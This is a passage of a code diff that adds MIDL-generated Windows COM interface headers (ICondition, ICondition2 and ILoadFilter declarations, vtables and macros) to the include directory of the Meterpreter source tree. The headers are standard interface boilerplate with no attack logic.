+#endif 	/* __IRichChunk_INTERFACE_DEFINED__ */
+
+
+#ifndef __ICondition_INTERFACE_DEFINED__
+#define __ICondition_INTERFACE_DEFINED__
+
+/* interface ICondition */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ICondition;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("0FC988D4-C935-4b97-A973-46282EA175C8")
+    ICondition : public IPersistStream
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE GetConditionType( 
+            /* [retval][out] */ __RPC__out CONDITION_TYPE *pNodeType) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetSubConditions( 
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **ppv) = 0;
+        
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE GetComparisonInfo( 
+            /* [annotation][unique][out] */ 
+            _Outptr_opt_result_maybenull_  LPWSTR *ppszPropertyName,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  CONDITION_OPERATION *pcop,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  PROPVARIANT *ppropvar) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetValueType( 
+            /* [retval][out] */ __RPC__deref_out_opt LPWSTR *ppszValueTypeName) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetValueNormalization( 
+            /* [retval][out] */ __RPC__deref_out_opt LPWSTR *ppszNormalization) = 0;
+        
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE GetInputTerms( 
+            /* [annotation][unique][out] */ 
+            _Out_opt_  IRichChunk **ppPropertyTerm,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  IRichChunk **ppOperationTerm,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  IRichChunk **ppValueTerm) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Clone( 
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppc) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IConditionVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ICondition * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ICondition * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ICondition * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetClassID )( 
+            __RPC__in ICondition * This,
+            /* [out] */ __RPC__out CLSID *pClassID);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsDirty )( 
+            __RPC__in ICondition * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Load )( 
+            __RPC__in ICondition * This,
+            /* [unique][in] */ __RPC__in_opt IStream *pStm);
+        
+        HRESULT ( STDMETHODCALLTYPE *Save )( 
+            __RPC__in ICondition * This,
+            /* [unique][in] */ __RPC__in_opt IStream *pStm,
+            /* [in] */ BOOL fClearDirty);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSizeMax )( 
+            __RPC__in ICondition * This,
+            /* [out] */ __RPC__out ULARGE_INTEGER *pcbSize);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetConditionType )( 
+            __RPC__in ICondition * This,
+            /* [retval][out] */ __RPC__out CONDITION_TYPE *pNodeType);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSubConditions )( 
+            __RPC__in ICondition * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **ppv);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetComparisonInfo )( 
+            ICondition * This,
+            /* [annotation][unique][out] */ 
+            _Outptr_opt_result_maybenull_  LPWSTR *ppszPropertyName,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  CONDITION_OPERATION *pcop,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  PROPVARIANT *ppropvar);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetValueType )( 
+            __RPC__in ICondition * This,
+            /* [retval][out] */ __RPC__deref_out_opt LPWSTR *ppszValueTypeName);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetValueNormalization )( 
+            __RPC__in ICondition * This,
+            /* [retval][out] */ __RPC__deref_out_opt LPWSTR *ppszNormalization);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetInputTerms )( 
+            ICondition * This,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  IRichChunk **ppPropertyTerm,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  IRichChunk **ppOperationTerm,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  IRichChunk **ppValueTerm);
+        
+        HRESULT ( STDMETHODCALLTYPE *Clone )( 
+            __RPC__in ICondition * This,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppc);
+        
+        END_INTERFACE
+    } IConditionVtbl;
+
+    interface ICondition
+    {
+        CONST_VTBL struct IConditionVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ICondition_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ICondition_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ICondition_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ICondition_GetClassID(This,pClassID)	\
+    ( (This)->lpVtbl -> GetClassID(This,pClassID) ) 
+
+
+#define ICondition_IsDirty(This)	\
+    ( (This)->lpVtbl -> IsDirty(This) ) 
+
+#define ICondition_Load(This,pStm)	\
+    ( (This)->lpVtbl -> Load(This,pStm) ) 
+
+#define ICondition_Save(This,pStm,fClearDirty)	\
+    ( (This)->lpVtbl -> Save(This,pStm,fClearDirty) ) 
+
+#define ICondition_GetSizeMax(This,pcbSize)	\
+    ( (This)->lpVtbl -> GetSizeMax(This,pcbSize) ) 
+
+
+#define ICondition_GetConditionType(This,pNodeType)	\
+    ( (This)->lpVtbl -> GetConditionType(This,pNodeType) ) 
+
+#define ICondition_GetSubConditions(This,riid,ppv)	\
+    ( (This)->lpVtbl -> GetSubConditions(This,riid,ppv) ) 
+
+#define ICondition_GetComparisonInfo(This,ppszPropertyName,pcop,ppropvar)	\
+    ( (This)->lpVtbl -> GetComparisonInfo(This,ppszPropertyName,pcop,ppropvar) ) 
+
+#define ICondition_GetValueType(This,ppszValueTypeName)	\
+    ( (This)->lpVtbl -> GetValueType(This,ppszValueTypeName) ) 
+
+#define ICondition_GetValueNormalization(This,ppszNormalization)	\
+    ( (This)->lpVtbl -> GetValueNormalization(This,ppszNormalization) ) 
+
+#define ICondition_GetInputTerms(This,ppPropertyTerm,ppOperationTerm,ppValueTerm)	\
+    ( (This)->lpVtbl -> GetInputTerms(This,ppPropertyTerm,ppOperationTerm,ppValueTerm) ) 
+
+#define ICondition_Clone(This,ppc)	\
+    ( (This)->lpVtbl -> Clone(This,ppc) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+/* [call_as] */ HRESULT STDMETHODCALLTYPE ICondition_RemoteGetComparisonInfo_Proxy( 
+    __RPC__in ICondition * This,
+    /* [out] */ __RPC__deref_out_opt LPWSTR *ppszPropertyName,
+    /* [out] */ __RPC__out CONDITION_OPERATION *pcop,
+    /* [out] */ __RPC__out PROPVARIANT *ppropvar);
+
+
+void __RPC_STUB ICondition_RemoteGetComparisonInfo_Stub(
+    IRpcStubBuffer *This,
+    IRpcChannelBuffer *_pRpcChannelBuffer,
+    PRPC_MESSAGE _pRpcMessage,
+    DWORD *_pdwStubPhase);
+
+
+/* [call_as] */ HRESULT STDMETHODCALLTYPE ICondition_RemoteGetInputTerms_Proxy( 
+    __RPC__in ICondition * This,
+    /* [out] */ __RPC__deref_out_opt IRichChunk **ppPropertyTerm,
+    /* [out] */ __RPC__deref_out_opt IRichChunk **ppOperationTerm,
+    /* [out] */ __RPC__deref_out_opt IRichChunk **ppValueTerm);
+
+
+void __RPC_STUB ICondition_RemoteGetInputTerms_Stub(
+    IRpcStubBuffer *This,
+    IRpcChannelBuffer *_pRpcChannelBuffer,
+    PRPC_MESSAGE _pRpcMessage,
+    DWORD *_pdwStubPhase);
+
+
+
+#endif 	/* __ICondition_INTERFACE_DEFINED__ */
+
+
+#ifndef __ICondition2_INTERFACE_DEFINED__
+#define __ICondition2_INTERFACE_DEFINED__
+
+/* interface ICondition2 */
+/* [unique][object][uuid] */ 
+
+
+EXTERN_C const IID IID_ICondition2;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("0DB8851D-2E5B-47eb-9208-D28C325A01D7")
+    ICondition2 : public ICondition
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE GetLocale( 
+            /* [out] */ __RPC__deref_out_opt LPWSTR *ppszLocaleName) = 0;
+        
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE GetLeafConditionInfo( 
+            /* [annotation][out] */ 
+            _Out_opt_  PROPERTYKEY *ppropkey,
+            /* [annotation][out] */ 
+            _Out_opt_  CONDITION_OPERATION *pcop,
+            /* [annotation][out] */ 
+            _Out_opt_  PROPVARIANT *ppropvar) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ICondition2Vtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ICondition2 * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ICondition2 * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ICondition2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetClassID )( 
+            __RPC__in ICondition2 * This,
+            /* [out] */ __RPC__out CLSID *pClassID);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsDirty )( 
+            __RPC__in ICondition2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Load )( 
+            __RPC__in ICondition2 * This,
+            /* [unique][in] */ __RPC__in_opt IStream *pStm);
+        
+        HRESULT ( STDMETHODCALLTYPE *Save )( 
+            __RPC__in ICondition2 * This,
+            /* [unique][in] */ __RPC__in_opt IStream *pStm,
+            /* [in] */ BOOL fClearDirty);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSizeMax )( 
+            __RPC__in ICondition2 * This,
+            /* [out] */ __RPC__out ULARGE_INTEGER *pcbSize);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetConditionType )( 
+            __RPC__in ICondition2 * This,
+            /* [retval][out] */ __RPC__out CONDITION_TYPE *pNodeType);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSubConditions )( 
+            __RPC__in ICondition2 * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **ppv);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetComparisonInfo )( 
+            ICondition2 * This,
+            /* [annotation][unique][out] */ 
+            _Outptr_opt_result_maybenull_  LPWSTR *ppszPropertyName,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  CONDITION_OPERATION *pcop,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  PROPVARIANT *ppropvar);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetValueType )( 
+            __RPC__in ICondition2 * This,
+            /* [retval][out] */ __RPC__deref_out_opt LPWSTR *ppszValueTypeName);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetValueNormalization )( 
+            __RPC__in ICondition2 * This,
+            /* [retval][out] */ __RPC__deref_out_opt LPWSTR *ppszNormalization);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetInputTerms )( 
+            ICondition2 * This,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  IRichChunk **ppPropertyTerm,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  IRichChunk **ppOperationTerm,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  IRichChunk **ppValueTerm);
+        
+        HRESULT ( STDMETHODCALLTYPE *Clone )( 
+            __RPC__in ICondition2 * This,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppc);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetLocale )( 
+            __RPC__in ICondition2 * This,
+            /* [out] */ __RPC__deref_out_opt LPWSTR *ppszLocaleName);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetLeafConditionInfo )( 
+            ICondition2 * This,
+            /* [annotation][out] */ 
+            _Out_opt_  PROPERTYKEY *ppropkey,
+            /* [annotation][out] */ 
+            _Out_opt_  CONDITION_OPERATION *pcop,
+            /* [annotation][out] */ 
+            _Out_opt_  PROPVARIANT *ppropvar);
+        
+        END_INTERFACE
+    } ICondition2Vtbl;
+
+    interface ICondition2
+    {
+        CONST_VTBL struct ICondition2Vtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ICondition2_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ICondition2_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ICondition2_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ICondition2_GetClassID(This,pClassID)	\
+    ( (This)->lpVtbl -> GetClassID(This,pClassID) ) 
+
+
+#define ICondition2_IsDirty(This)	\
+    ( (This)->lpVtbl -> IsDirty(This) ) 
+
+#define ICondition2_Load(This,pStm)	\
+    ( (This)->lpVtbl -> Load(This,pStm) ) 
+
+#define ICondition2_Save(This,pStm,fClearDirty)	\
+    ( (This)->lpVtbl -> Save(This,pStm,fClearDirty) ) 
+
+#define ICondition2_GetSizeMax(This,pcbSize)	\
+    ( (This)->lpVtbl -> GetSizeMax(This,pcbSize) ) 
+
+
+#define ICondition2_GetConditionType(This,pNodeType)	\
+    ( (This)->lpVtbl -> GetConditionType(This,pNodeType) ) 
+
+#define ICondition2_GetSubConditions(This,riid,ppv)	\
+    ( (This)->lpVtbl -> GetSubConditions(This,riid,ppv) ) 
+
+#define ICondition2_GetComparisonInfo(This,ppszPropertyName,pcop,ppropvar)	\
+    ( (This)->lpVtbl -> GetComparisonInfo(This,ppszPropertyName,pcop,ppropvar) ) 
+
+#define ICondition2_GetValueType(This,ppszValueTypeName)	\
+    ( (This)->lpVtbl -> GetValueType(This,ppszValueTypeName) ) 
+
+#define ICondition2_GetValueNormalization(This,ppszNormalization)	\
+    ( (This)->lpVtbl -> GetValueNormalization(This,ppszNormalization) ) 
+
+#define ICondition2_GetInputTerms(This,ppPropertyTerm,ppOperationTerm,ppValueTerm)	\
+    ( (This)->lpVtbl -> GetInputTerms(This,ppPropertyTerm,ppOperationTerm,ppValueTerm) ) 
+
+#define ICondition2_Clone(This,ppc)	\
+    ( (This)->lpVtbl -> Clone(This,ppc) ) 
+
+
+#define ICondition2_GetLocale(This,ppszLocaleName)	\
+    ( (This)->lpVtbl -> GetLocale(This,ppszLocaleName) ) 
+
+#define ICondition2_GetLeafConditionInfo(This,ppropkey,pcop,ppropvar)	\
+    ( (This)->lpVtbl -> GetLeafConditionInfo(This,ppropkey,pcop,ppropvar) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+/* [call_as] */ HRESULT STDMETHODCALLTYPE ICondition2_RemoteGetLeafConditionInfo_Proxy( 
+    __RPC__in ICondition2 * This,
+    /* [out] */ __RPC__out PROPERTYKEY *ppropkey,
+    /* [out] */ __RPC__out CONDITION_OPERATION *pcop,
+    /* [out] */ __RPC__out PROPVARIANT *ppropvar);
+
+
+void __RPC_STUB ICondition2_RemoteGetLeafConditionInfo_Stub(
+    IRpcStubBuffer *This,
+    IRpcChannelBuffer *_pRpcChannelBuffer,
+    PRPC_MESSAGE _pRpcMessage,
+    DWORD *_pdwStubPhase);
+
+
+
+#endif 	/* __ICondition2_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_structuredquerycondition_0000_0003 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+
+
+extern RPC_IF_HANDLE __MIDL_itf_structuredquerycondition_0000_0003_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_structuredquerycondition_0000_0003_v0_0_s_ifspec;
+
+/* Additional Prototypes for ALL interfaces */
+
+unsigned long             __RPC_USER  BSTR_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
+void                      __RPC_USER  BSTR_UserFree(     __RPC__in unsigned long *, __RPC__in BSTR * ); 
+
+unsigned long             __RPC_USER  LPSAFEARRAY_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out LPSAFEARRAY * ); 
+void                      __RPC_USER  LPSAFEARRAY_UserFree(     __RPC__in unsigned long *, __RPC__in LPSAFEARRAY * ); 
+
+unsigned long             __RPC_USER  BSTR_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
+void                      __RPC_USER  BSTR_UserFree64(     __RPC__in unsigned long *, __RPC__in BSTR * ); 
+
+unsigned long             __RPC_USER  LPSAFEARRAY_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out LPSAFEARRAY * ); 
+void                      __RPC_USER  LPSAFEARRAY_UserFree64(     __RPC__in unsigned long *, __RPC__in LPSAFEARRAY * ); 
+
+/* [local] */ HRESULT STDMETHODCALLTYPE IRichChunk_GetData_Proxy( 
+    IRichChunk * This,
+    /* [annotation][unique][out] */ 
+    _Out_opt_  ULONG *pFirstPos,
+    /* [annotation][unique][out] */ 
+    _Out_opt_  ULONG *pLength,
+    /* [annotation][unique][out] */ 
+    _Outptr_opt_result_maybenull_  LPWSTR *ppsz,
+    /* [annotation][unique][out] */ 
+    _Out_opt_  PROPVARIANT *pValue);
+
+
+/* [call_as] */ HRESULT STDMETHODCALLTYPE IRichChunk_GetData_Stub( 
+    __RPC__in IRichChunk * This,
+    /* [out] */ __RPC__out ULONG *pFirstPos,
+    /* [out] */ __RPC__out ULONG *pLength,
+    /* [out] */ __RPC__deref_out_opt LPWSTR *ppsz,
+    /* [out] */ __RPC__out PROPVARIANT *pValue);
+
+/* [local] */ HRESULT STDMETHODCALLTYPE ICondition_GetComparisonInfo_Proxy( 
+    ICondition * This,
+    /* [annotation][unique][out] */ 
+    _Outptr_opt_result_maybenull_  LPWSTR *ppszPropertyName,
+    /* [annotation][unique][out] */ 
+    _Out_opt_  CONDITION_OPERATION *pcop,
+    /* [annotation][unique][out] */ 
+    _Out_opt_  PROPVARIANT *ppropvar);
+
+
+/* [call_as] */ HRESULT STDMETHODCALLTYPE ICondition_GetComparisonInfo_Stub( 
+    __RPC__in ICondition * This,
+    /* [out] */ __RPC__deref_out_opt LPWSTR *ppszPropertyName,
+    /* [out] */ __RPC__out CONDITION_OPERATION *pcop,
+    /* [out] */ __RPC__out PROPVARIANT *ppropvar);
+
+/* [local] */ HRESULT STDMETHODCALLTYPE ICondition_GetInputTerms_Proxy( 
+    ICondition * This,
+    /* [annotation][unique][out] */ 
+    _Out_opt_  IRichChunk **ppPropertyTerm,
+    /* [annotation][unique][out] */ 
+    _Out_opt_  IRichChunk **ppOperationTerm,
+    /* [annotation][unique][out] */ 
+    _Out_opt_  IRichChunk **ppValueTerm);
+
+
+/* [call_as] */ HRESULT STDMETHODCALLTYPE ICondition_GetInputTerms_Stub( 
+    __RPC__in ICondition * This,
+    /* [out] */ __RPC__deref_out_opt IRichChunk **ppPropertyTerm,
+    /* [out] */ __RPC__deref_out_opt IRichChunk **ppOperationTerm,
+    /* [out] */ __RPC__deref_out_opt IRichChunk **ppValueTerm);
+
+/* [local] */ HRESULT STDMETHODCALLTYPE ICondition2_GetLeafConditionInfo_Proxy( 
+    ICondition2 * This,
+    /* [annotation][out] */ 
+    _Out_opt_  PROPERTYKEY *ppropkey,
+    /* [annotation][out] */ 
+    _Out_opt_  CONDITION_OPERATION *pcop,
+    /* [annotation][out] */ 
+    _Out_opt_  PROPVARIANT *ppropvar);
+
+
+/* [call_as] */ HRESULT STDMETHODCALLTYPE ICondition2_GetLeafConditionInfo_Stub( 
+    __RPC__in ICondition2 * This,
+    /* [out] */ __RPC__out PROPERTYKEY *ppropkey,
+    /* [out] */ __RPC__out CONDITION_OPERATION *pcop,
+    /* [out] */ __RPC__out PROPVARIANT *ppropvar);
+
+
+
+/* end of Additional Prototypes */
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif
+
+

--- a/c/meterpreter/source/extra_includes/filtereg.h
+++ b/c/meterpreter/source/extra_includes/filtereg.h
@@ -1,0 +1,379 @@
+
+
+/* this ALWAYS GENERATED file contains the definitions for the interfaces */
+
+
+ /* File created by MIDL compiler version 8.01.0622 */
+/* @@MIDL_FILE_HEADING(  ) */
+
+
+
+/* verify that the <rpcndr.h> version is high enough to compile this file*/
+#ifndef __REQUIRED_RPCNDR_H_VERSION__
+#define __REQUIRED_RPCNDR_H_VERSION__ 500
+#endif
+
+/* verify that the <rpcsal.h> version is high enough to compile this file*/
+#ifndef __REQUIRED_RPCSAL_H_VERSION__
+#define __REQUIRED_RPCSAL_H_VERSION__ 100
+#endif
+
+#include "rpc.h"
+#include "rpcndr.h"
+
+#ifndef __RPCNDR_H_VERSION__
+#error this stub requires an updated version of <rpcndr.h>
+#endif /* __RPCNDR_H_VERSION__ */
+
+#ifndef COM_NO_WINDOWS_H
+#include "windows.h"
+#include "ole2.h"
+#endif /*COM_NO_WINDOWS_H*/
+
+#ifndef __filtereg_h__
+#define __filtereg_h__
+
+#if defined(_MSC_VER) && (_MSC_VER >= 1020)
+#pragma once
+#endif
+
+/* Forward Declarations */ 
+
+#ifndef __ILoadFilter_FWD_DEFINED__
+#define __ILoadFilter_FWD_DEFINED__
+typedef interface ILoadFilter ILoadFilter;
+
+#endif 	/* __ILoadFilter_FWD_DEFINED__ */
+
+
+#ifndef __ILoadFilterWithPrivateComActivation_FWD_DEFINED__
+#define __ILoadFilterWithPrivateComActivation_FWD_DEFINED__
+typedef interface ILoadFilterWithPrivateComActivation ILoadFilterWithPrivateComActivation;
+
+#endif 	/* __ILoadFilterWithPrivateComActivation_FWD_DEFINED__ */
+
+
+/* header files for imported files */
+#include "oaidl.h"
+#include "ocidl.h"
+#include "filter.h"
+
+#ifdef __cplusplus
+extern "C"{
+#endif 
+
+
+/* interface __MIDL_itf_filtereg_0000_0000 */
+/* [local] */ 
+
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+EXTERN_C const CLSID CLSID_FilterRegistration;
+
+
+extern RPC_IF_HANDLE __MIDL_itf_filtereg_0000_0000_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_filtereg_0000_0000_v0_0_s_ifspec;
+
+#ifndef __ILoadFilter_INTERFACE_DEFINED__
+#define __ILoadFilter_INTERFACE_DEFINED__
+
+/* interface ILoadFilter */
+/* [unique][helpstring][uuid][object] */ 
+
+typedef struct _FILTERED_DATA_SOURCES
+    {
+    const WCHAR *pwcsExtension;
+    const WCHAR *pwcsMime;
+    const CLSID *pClsid;
+    const WCHAR *pwcsOverride;
+    } 	FILTERED_DATA_SOURCES;
+
+
+EXTERN_C const IID IID_ILoadFilter;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("c7310722-ac80-11d1-8df3-00c04fb6ef4f")
+    ILoadFilter : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE LoadIFilter( 
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pwcsPath,
+            /* [unique][in] */ __RPC__in_opt FILTERED_DATA_SOURCES *pFilteredSources,
+            /* [unique][in] */ __RPC__in_opt IUnknown *pUnkOuter,
+            /* [in] */ BOOL fUseDefault,
+            /* [unique][out][in] */ __RPC__inout_opt CLSID *pFilterClsid,
+            /* [unique][out][in] */ __RPC__inout_opt int *SearchDecSize,
+            /* [length_is][length_is][size_is][size_is][unique][out][in] */ __RPC__deref_opt_inout_ecount_part_opt(( *SearchDecSize + 1 ) , ( *SearchDecSize + 1 ) ) WCHAR **pwcsSearchDesc,
+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **ppIFilt) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE LoadIFilterFromStorage( 
+            /* [in] */ __RPC__in_opt IStorage *pStg,
+            /* [unique][in] */ __RPC__in_opt IUnknown *pUnkOuter,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pwcsOverride,
+            /* [in] */ BOOL fUseDefault,
+            /* [unique][out][in] */ __RPC__inout_opt CLSID *pFilterClsid,
+            /* [unique][out][in] */ __RPC__inout_opt int *SearchDecSize,
+            /* [length_is][length_is][size_is][size_is][unique][out][in] */ __RPC__deref_opt_inout_ecount_part_opt(( *SearchDecSize + 1 ) , ( *SearchDecSize + 1 ) ) WCHAR **pwcsSearchDesc,
+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **ppIFilt) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE LoadIFilterFromStream( 
+            /* [in] */ __RPC__in_opt IStream *pStm,
+            /* [unique][in] */ __RPC__in_opt FILTERED_DATA_SOURCES *pFilteredSources,
+            /* [unique][in] */ __RPC__in_opt IUnknown *pUnkOuter,
+            /* [in] */ BOOL fUseDefault,
+            /* [unique][out][in] */ __RPC__inout_opt CLSID *pFilterClsid,
+            /* [unique][out][in] */ __RPC__inout_opt int *SearchDecSize,
+            /* [length_is][length_is][size_is][size_is][unique][out][in] */ __RPC__deref_opt_inout_ecount_part_opt(( *SearchDecSize + 1 ) , ( *SearchDecSize + 1 ) ) WCHAR **pwcsSearchDesc,
+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **ppIFilt) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ILoadFilterVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ILoadFilter * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ILoadFilter * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ILoadFilter * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *LoadIFilter )( 
+            __RPC__in ILoadFilter * This,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pwcsPath,
+            /* [unique][in] */ __RPC__in_opt FILTERED_DATA_SOURCES *pFilteredSources,
+            /* [unique][in] */ __RPC__in_opt IUnknown *pUnkOuter,
+            /* [in] */ BOOL fUseDefault,
+            /* [unique][out][in] */ __RPC__inout_opt CLSID *pFilterClsid,
+            /* [unique][out][in] */ __RPC__inout_opt int *SearchDecSize,
+            /* [length_is][length_is][size_is][size_is][unique][out][in] */ __RPC__deref_opt_inout_ecount_part_opt(( *SearchDecSize + 1 ) , ( *SearchDecSize + 1 ) ) WCHAR **pwcsSearchDesc,
+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **ppIFilt);
+        
+        HRESULT ( STDMETHODCALLTYPE *LoadIFilterFromStorage )( 
+            __RPC__in ILoadFilter * This,
+            /* [in] */ __RPC__in_opt IStorage *pStg,
+            /* [unique][in] */ __RPC__in_opt IUnknown *pUnkOuter,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pwcsOverride,
+            /* [in] */ BOOL fUseDefault,
+            /* [unique][out][in] */ __RPC__inout_opt CLSID *pFilterClsid,
+            /* [unique][out][in] */ __RPC__inout_opt int *SearchDecSize,
+            /* [length_is][length_is][size_is][size_is][unique][out][in] */ __RPC__deref_opt_inout_ecount_part_opt(( *SearchDecSize + 1 ) , ( *SearchDecSize + 1 ) ) WCHAR **pwcsSearchDesc,
